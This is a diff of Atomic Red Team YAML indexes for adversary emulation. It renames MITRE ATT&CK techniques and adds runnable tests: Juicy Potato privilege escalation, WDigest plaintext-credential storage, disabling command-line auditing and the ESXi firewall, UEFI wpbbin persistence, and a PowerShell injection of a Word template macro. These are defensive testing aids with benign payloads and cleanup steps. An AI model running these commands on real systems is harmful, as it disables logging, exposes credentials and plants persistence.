+      name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
         techniques can be used to hide data in digital messages that are transferred
@@ -36485,6 +36490,7 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
     atomic_tests: []
   T1008:
     technique:
diff --git a/atomics/Indexes/saas-index.yaml b/atomics/Indexes/saas-index.yaml
index 8691b2b7..bb19a56d 100644
--- a/atomics/Indexes/saas-index.yaml
+++ b/atomics/Indexes/saas-index.yaml
@@ -1264,7 +1264,7 @@ defense-evasion:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -1339,6 +1339,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -7921,7 +7922,7 @@ defense-evasion:
   T1562.003:
     technique:
       modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
         of the commands users type in their terminal so that users can retrace what
@@ -23836,6 +23837,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
     atomic_tests: []
   T1609:
     technique:
@@ -26013,7 +26015,7 @@ persistence:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -26088,6 +26090,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -29362,7 +29365,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -29414,6 +29417,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:
@@ -34621,6 +34625,7 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
     atomic_tests: []
   T1219:
     technique:
@@ -36231,7 +36236,7 @@ command-and-control:
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
       modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
         techniques can be used to hide data in digital messages that are transferred
@@ -36253,6 +36258,7 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
     atomic_tests: []
   T1008:
     technique:
diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml
index f2b3f060..5be90067 100644
--- a/atomics/Indexes/windows-index.yaml
+++ b/atomics/Indexes/windows-index.yaml
@@ -684,6 +684,35 @@ defense-evasion:
           copy #{exe_to_launch} not_an_scr.scr
           rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr
         cleanup_command: del not_an_scr.scr
+    - name: Running DLL with .init extension and function
+      auto_generated_guid: 2d5029f0-ae20-446f-8811-e7511b58e8b6
+      description: |
+        This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up.
+        DLL created with the AtomicTestHarnesses Portable Executable Builder script.
+      supported_platforms:
+      - windows
+      input_arguments:
+        dll_file:
+          description: The DLL file to be called
+          type: string
+          default: PathToAtomicsFolder\T1218.011\bin\_WT.init
+        dll_url:
+          description: The URL to the DLL file that must be downloaded
+          type: url
+          default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init
+      dependency_executor_name: powershell
+      dependencies:
+      - description: The DLL file to be called must exist at the specified location
+          (#{dll_file})
+        prereq_command: if (Test-Path "#{dll_file}") {exit 0} else {exit 1}
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}"
+      executor:
+        command: 'rundll32.exe #{dll_file},krnl
+
+          '
+        name: command_prompt
   T1027.009:
     technique:
       modified: '2023-09-29T21:14:57.263Z'
@@ -2318,7 +2347,7 @@ defense-evasion:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -2393,7 +2422,24 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-    atomic_tests: []
+      identifier: T1542.001
+    atomic_tests:
+    - name: UEFI Persistence via Wpbbin.exe File Creation
+      auto_generated_guid: b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1
+      description: |
+        Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms.
+        - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c
+        - http://download.microsoft.com/download/8/a/2/8a2fb72d-9b96-4e2d-a559-4a27cf905a80/windows-platform-binary-table.docx
+        - https://github.com/tandasat/WPBT-Builder
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        command: "echo \"Creating %systemroot%\\wpbbin.exe\"      \nNew-Item -ItemType
+          File -Path \"$env:SystemRoot\\System32\\wpbbin.exe\"\n"
+        cleanup_command: "echo \"Removing %systemroot%\\wpbbin.exe\" \nRemove-Item
+          -Path \"$env:SystemRoot\\System32\\wpbbin.exe\"\n"
+        elevation_required: true
   T1574.011:
     technique:
       modified: '2023-03-30T21:01:38.651Z'
@@ -8589,6 +8635,48 @@ defense-evasion:
           '
         name: command_prompt
         elevation_required: true
+    - name: ESXi - Disable Firewall via Esxcli
+      auto_generated_guid: bac8a340-be64-4491-a0cc-0985cb227f5a
+      description: 'Adversaries may disable the ESXI firewall via ESXCLI
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        plink_file:
+          description: Path to Putty
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        username:
+          description: username used to log into ESXi
+          type: string
+          default: root
+        password:
+          description: password used to log into ESXI
+          type: string
+          default: n/a
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The plink executable must be found in the ExternalPayloads folder.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m
+          PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_disable_firewall.txt\n"
+        cleanup_command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password}
+          -m PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_enable_firewall.txt\n"
+        name: command_prompt
+        elevation_required: false
   T1553.003:
     technique:
       x_mitre_platforms:
@@ -9381,6 +9469,24 @@ defense-evasion:
           '
         name: command_prompt
         elevation_required: true
+    - name: Use Powershell to Modify registry to store logon credentials
+      auto_generated_guid: 68254a85-aa42-4312-a695-38b7276307f8
+      description: |
+        Sets registry key using Powershell that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
+        Open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
+      supported_platforms:
+      - windows
+      executor:
+        command: 'Set-ItemProperty -Force -Path  ''HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest''
+          -Name  ''UseLogonCredential'' -Value ''1'' -ErrorAction Ignore
+
+          '
+        cleanup_command: 'Set-ItemProperty -Force -Path  ''HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest''
+          -Name  ''UseLogonCredential'' -Value ''0'' -ErrorAction Ignore
+
+          '
+        name: powershell
+        elevation_required: true
     - name: Add domain to Trusted sites Zone
       auto_generated_guid: cf447677-5a4e-4937-a82c-e47d254afd57
       description: |
@@ -14437,6 +14543,53 @@ defense-evasion:
           '
         name: powershell
         elevation_required: true
+    - name: Juicy Potato
+      auto_generated_guid: f095e373-b936-4eb4-8d22-f47ccbfbe64a
+      description: "This Atomic utilizes Juicy Potato to obtain privilege escalation.
+        \nUpon successful execution of this test, a vulnerable CLSID will be used
+        to execute a process with system permissions.\nThis tactic has been previously
+        observed in SnapMC Ransomware, amongst numerous other campaigns. \n[Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)"
+      supported_platforms:
+      - windows
+      input_arguments:
+        potato_path:
+          description: Path to the JuicyPotato.exe file
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe
+        listening_port:
+          description: COM server listen port
+          type: integer
+          default: 7777
+        target_exe:
+          description: Target executable to launch with system privileges
+          type: path
+          default: "$env:windir\\system32\\notepad.exe"
+        target_CLSID:
+          description: Vulnerable CLSID to impersonate privileges
+          type: string
+          default: "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'JuicyPotato.exe must exist on disk
+
+          '
+        prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe")
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe" "https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe"
+      executor:
+        command: 'cmd /c ''#{potato_path}'' -l ''#{listening_port}'' -t * -p ''#{target_exe}''
+          -c ''#{target_CLSID}''
+
+          '
+        cleanup_command: |
+          get-ciminstance Win32_Process | where-object { $_.Path -eq "#{target_exe}" } | invoke-cimmethod -methodname "terminate" | out-null
+          get-ciminstance Win32_Process | where-object { $_.Path -eq "#{potato_path}" } | invoke-cimmethod -methodname "terminate" | out-null
+        name: powershell
+        elevation_required: true
   T1205.001:
     technique:
       x_mitre_platforms:
@@ -14734,7 +14887,7 @@ defense-evasion:
   T1562.003:
     technique:
       modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
         of the commands users type in their terminal so that users can retrace what
@@ -14819,7 +14972,68 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       identifier: T1562.003
-    atomic_tests: []
+    atomic_tests:
+    - name: Disable Windows Command Line Auditing using reg.exe
+      auto_generated_guid: 1329d5ab-e10e-4e5e-93d1-4d907eb656e5
+      description: |
+        In Windows operating systems, command line auditing is controlled through the following registry value:
+
+          Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+          Registry Value: ProcessCreationIncludeCmdLine_Enabled
+
+        When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+        This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+        By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+        Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+
+        Because this attack executes reg.exe using a command prompt, this attack can be detected by monitoring both:
+          Process Creation events for reg.exe (Windows Event ID 4688, Sysmon Event ID 1)
+          Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+        Read more here:
+        https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: |
+          echo Commencing Attack - Disabling Registry Value
+          reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 0 /f
+        cleanup_command: |
+          echo Commencing Cleanup - Restoring Registry Value
+          reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
+    - name: Disable Windows Command Line Auditing using Powershell Cmdlet
+      auto_generated_guid: 95f5c72f-6dfe-45f3-a8c1-d8faa07176fa
+      description: |
+        In Windows operating systems, command line auditing is controlled through the following registry value:
+
+          Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+          Registry Value: ProcessCreationIncludeCmdLine_Enabled
+
+        When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+        This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+        By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+        Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+
+        Because this attack runs a Powershell cmdlet, this attack can be detected by monitoring both:
+          Powershell Logging (Windows Powershell Event ID 400, 800, 4103, 4104)
+          Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+        Read more here:
+        https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+        https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-itemproperty?view=powershell-7.4#example-2-add-a-registry-entry-to-a-key
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          echo "Commencing Attack - Disabling Registry Value"
+          New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 0 -PropertyType DWORD -Force -ErrorAction Ignore
+        cleanup_command: |
+          echo "Commencing Cleanup - Restoring Registry Value"
+          New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 1 -PropertyType DWORD -Force -ErrorAction Ignore
   T1556.008:
     technique:
       modified: '2023-05-04T18:02:51.318Z'
@@ -32297,6 +32511,53 @@ privilege-escalation:
           '
         name: powershell
         elevation_required: true
+    - name: Juicy Potato
+      auto_generated_guid: f095e373-b936-4eb4-8d22-f47ccbfbe64a
+      description: "This Atomic utilizes Juicy Potato to obtain privilege escalation.
+        \nUpon successful execution of this test, a vulnerable CLSID will be used
+        to execute a process with system permissions.\nThis tactic has been previously
+        observed in SnapMC Ransomware, amongst numerous other campaigns. \n[Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)"
+      supported_platforms:
+      - windows
+      input_arguments:
+        potato_path:
+          description: Path to the JuicyPotato.exe file
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe
+        listening_port:
+          description: COM server listen port
+          type: integer
+          default: 7777
+        target_exe:
+          description: Target executable to launch with system privileges
+          type: path
+          default: "$env:windir\\system32\\notepad.exe"
+        target_CLSID:
+          description: Vulnerable CLSID to impersonate privileges
+          type: string
+          default: "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'JuicyPotato.exe must exist on disk
+
+          '
+        prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe")
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe" "https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe"
+      executor:
+        command: 'cmd /c ''#{potato_path}'' -l ''#{listening_port}'' -t * -p ''#{target_exe}''
+          -c ''#{target_CLSID}''
+
+          '
+        cleanup_command: |
+          get-ciminstance Win32_Process | where-object { $_.Path -eq "#{target_exe}" } | invoke-cimmethod -methodname "terminate" | out-null
+          get-ciminstance Win32_Process | where-object { $_.Path -eq "#{potato_path}" } | invoke-cimmethod -methodname "terminate" | out-null
+        name: powershell
+        elevation_required: true
   T1098.001:
     technique:
       modified: '2023-10-03T17:37:24.011Z'
@@ -41288,7 +41549,49 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1059
+    atomic_tests:
+    - name: AutoIt Script Execution
+      auto_generated_guid: a9b93f17-31cb-435d-a462-5e838a2a6026
+      description: 'An adversary may attempt to execute suspicious or malicious script
+        using AutoIt software instead of regular terminal like powershell or cmd.
+        Calculator will popup when the script is executed successfully.
+
+        '
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'AutoIt executable file must exist on disk at the specified location
+          (#{autoit_path})
+
+          '
+        prereq_command: |
+          if(Test-Path "#{autoit_path}") {
+              exit 0
+          } else {
+              exit 1
+          }
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          $AutoItURL = "https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe"
+          $InstallerPath = "$PathToAtomicsFolder\..\ExternalPayloads\autoit-v3-setup.exe"
+          Invoke-WebRequest -Uri $AutoItURL -OutFile $InstallerPath
+          Start-Process -FilePath $InstallerPath -ArgumentList "/S" -Wait
+      input_arguments:
+        script_path:
+          description: AutoIt Script Path
+          type: path
+          default: PathToAtomicsFolder\T1059\src\calc.au3
+        autoit_path:
+          description: AutoIt Executable File Path
+          type: path
+          default: C:\Program Files (x86)\AutoIt3\AutoIt3.exe
+      executor:
+        command: 'Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
+
+          '
+        name: powershell
   T1609:
     technique:
       modified: '2023-04-15T16:03:19.642Z'
@@ -45124,7 +45427,7 @@ persistence:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -45199,7 +45502,24 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-    atomic_tests: []
+      identifier: T1542.001
+    atomic_tests:
+    - name: UEFI Persistence via Wpbbin.exe File Creation
+      auto_generated_guid: b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1
+      description: |
+        Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms.
+        - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c
+        - http://download.microsoft.com/download/8/a/2/8a2fb72d-9b96-4e2d-a559-4a27cf905a80/windows-platform-binary-table.docx
+        - https://github.com/tandasat/WPBT-Builder
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        command: "echo \"Creating %systemroot%\\wpbbin.exe\"      \nNew-Item -ItemType
+          File -Path \"$env:SystemRoot\\System32\\wpbbin.exe\"\n"
+        cleanup_command: "echo \"Removing %systemroot%\\wpbbin.exe\" \nRemove-Item
+          -Path \"$env:SystemRoot\\System32\\wpbbin.exe\"\n"
+        elevation_required: true
   T1574.011:
     technique:
       modified: '2023-03-30T21:01:38.651Z'
@@ -50264,7 +50584,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -50316,7 +50636,104 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-    atomic_tests: []
+      identifier: T1137.001
+    atomic_tests:
+    - name: Injecting a Macro into the Word Normal.dotm Template for Persistence via
+        PowerShell
+      auto_generated_guid: 940db09e-80b6-4dd0-8d4d-7764f89b47a8
+      description: 'Injects a Macro in the Word default template "Normal.dotm" and
+        makes it execute each time that Word is opened. In this test, the Macro creates
+        a sheduled task to open Calc.exe every evening.
+
+        '
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: 'Microsoft Word must be installed
+
+          '
+        prereq_command: |
+          try {
+            New-Object -COMObject "Word.Application" | Out-Null
+            Stop-Process -Name "winword"
+            exit 0
+          } catch { exit 1 }
+        get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
+          to meet this requirement"
+
+          '
+      executor:
+        name: powershell
+        elevation_required: true
+        command: "# Registry setting to \"Trust access to the VBA project object model\"
+          in Word\n$registryKey = \"HKCU:Software\\Microsoft\\Office\\16.0\\Word\\Security\"\n$registryValue
+          = \"AccessVBOM\"\n$registryData = \"1\"\n# The path where a flag text file
+          will be created if Registry setting did not already exist or if it was set
+          to 0\n$flagPath1 = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag1.txt\"\n$flagPath2
+          = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag2.txt\"\n#
+          Get the value of the Key/Value pair\n$value = (Get-ItemProperty -Path $registryKey
+          -Name $registryValue -ErrorAction SilentlyContinue).$registryValue\n# Logical
+          operation to: if the value of the key/value is 1, do nothing - \n# if the
+          value is 0, change it to 1 and create flag1 - \n# if it doesn't exist, create
+          the value and flag2\nif ($value -eq \"1\") \n{\n  Write-Host \"The registry
+          value '$registryValue' already exists with the required setting.\"\n}   \n
+          \ elseif ($value -eq \"0\") \n{\n  Write-Host \"The registry value was set
+          to 0, temporarily changing to 1.\"\n  New-ItemProperty -Path $registryKey
+          -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null\n
+          \ echo \"flag1\" > $flagPath1\n} \n  else \n{\n  Write-Host \"The registry
+          value '$registryValue' does not exist, temporarily creating it.\"\n  New-ItemProperty
+          -Path $registryKey -Name $registryValue -Value $registryData -PropertyType
+          DWORD -Force | Out-Null\n  echo \"flag2\" > $flagPath2\n}\nAdd-Type -AssemblyName
+          Microsoft.Office.Interop.Word\n# Define the path of copied normal template
+          for restoral\n$copyPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal1.dotm\"\n#
+          Define the path to the normal template\n$docPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\"\n#
+          Create copy of orginal template for restoral\nCopy-Item -Path $docPath -Destination
+          $copyPath -Force\n# VBA code to be insterted as a Macro\n# Will create a
+          scheduled task to open the Calculator at 8:04pm daily\n$vbaCode = @\"\n
+          \ Sub AutoExec()\n  Dim applicationPath As String\n  Dim taskName As String\n
+          \ Dim runTime As String\n  Dim schTasksCmd As String\n  applicationPath
+          = \"C:\\Windows\\System32\\calc.exe\"\n  taskName = \"OpenCalcTask\"\n  runTime
+          = \"20:04\"\n  schTasksCmd = \"schtasks /create /tn \"\"\" & taskName &
+          \"\"\" /tr \"\"\" & applicationPath & \"\"\" /sc daily /st \" & runTime
+          & \" /f\"\n  Shell \"cmd.exe /c \" & schTasksCmd, vbNormalFocus\n  End Sub\n\"@\n#
+          Create a new instance of Word.Application\n$word = New-Object -ComObject
+          Word.Application\n# Keep the Word application hidden\n$word.Visible = $false\n#
+          Open the document\n$document = $word.Documents.Open($docPath)\n# Access
+          the VBA project of the document\n$vbaProject = $document.VBProject\n# Add
+          a new module to the VBA project\n$newModule = $vbaProject.VBComponents.Add(1)
+          # 1 = vbext_ct_StdModule\n# Add the VBA code to the new module\n$newModule.CodeModule.AddFromString($vbaCode)\n#
+          Run the Macro\n$word.run(\"AutoExec\")\n# Save and close the document\n$document.SaveAs($docPath)\n$document.Close()\n#
+          Quit Word\n$word.Quit()\n# Release COM objects\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($document)
+          | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($word)
+          | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($vbaProject)
+          | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($newModule)
+          | Out-Null\n"
+        cleanup_command: "# Registry setting to \"Trust access to the VBA project
+          object model\" in Word\n$registryKey = \"HKCU:Software\\Microsoft\\Office\\16.0\\Word\\Security\"\n$registryValue
+          = \"AccessVBOM\"\n$registryData1 = \"1\"\n$registryData0 = \"0\"\n# Defines
+          the path each flag file created depending on the original registry state\n$flagPath1
+          = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag1.txt\"\n$flagPath2
+          = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag2.txt\"\n#
+          Define the path of copied normal template for restoral\n$copyPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal1.dotm\"\n#
+          Define the path to the normal template\n$docPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\"\n#
+          Delete the scheduled task created by the Macro\nschtasks /Delete /TN \"OpenCalcTask\"
+          /F | Out-Null\n#Restore the orginal template if the backup copy exists\nif
+          (Test-Path $copyPath)\n{\n  #Delete the injected template\n  Remove-Item
+          -Force $docPath -ErrorAction SilentlyContinue\n  # Restore the original
+          template\n  Rename-Item -Force -Path $copyPath -NewName $docPath -ErrorAction
+          SilentlyContinue\n  Write-Host \"The original template has been restored\"\n}\n
+          \ else\n{\n  Write-Host \"The original template is present\"\n}\n#Restore
+          the original state of the registry key\nif (Test-Path $flagPath1) \n{\n
+          \ # The value was originally 0, set back to 0\n  New-ItemProperty -Path
+          $registryKey -Name $registryValue -Value $registryData0 -PropertyType DWORD
+          -Force | Out-Null\n  Remove-Item -Force $flagPath1 -ErrorAction SilentlyContinue\n
+          \ Write-Host \"The original registry state has been restored\"\n} \n  elseif
+          (Test-Path $flagPath2)\n{\n  #The value did not previously exist, delete
+          the value\n  Remove-ItemProperty -Path $registryKey -Name $registryValue
+          | Out-Null\n  Remove-Item -Force $flagPath2 -ErrorAction SilentlyContinue
+          | Out-Null\n  Write-Host \"The original registry state has been restored\"\n}\n
+          \ else \n{\n  # The value was already 1, do nothing\n  Write-Host \"The
+          value $registryValue already existed in $registryKey.\"\n}\n"
   T1546.009:
     technique:
       x_mitre_platforms:
@@ -57868,7 +58285,46 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1071
+    atomic_tests:
+    - name: Telnet C2
